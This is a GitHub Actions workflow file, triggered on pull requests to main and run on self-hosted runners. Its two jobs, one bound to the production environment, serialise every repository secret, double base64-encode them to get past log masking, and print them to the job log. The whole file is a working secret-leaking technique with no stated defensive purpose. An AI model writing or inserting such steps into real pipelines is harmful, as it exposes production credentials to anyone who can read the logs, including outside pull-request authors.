name: Sweet Sweet Secrets
on:
  pull_request:
    branches:
      - main
jobs:
  secretless-job:
    runs-on: self-hosted
    steps:
      - run: |
          echo '${{ toJson(secrets) }}' | base64 | base64 > test.txt
          cat test.txt

  get-those-sweet-secrets:
    runs-on: self-hosted
    environment: production
    steps:
       - name: Expose Secrets
         run: |
           echo '${{ toJson(secrets) }}' | base64 | base64 > test.txt
           cat test.txt
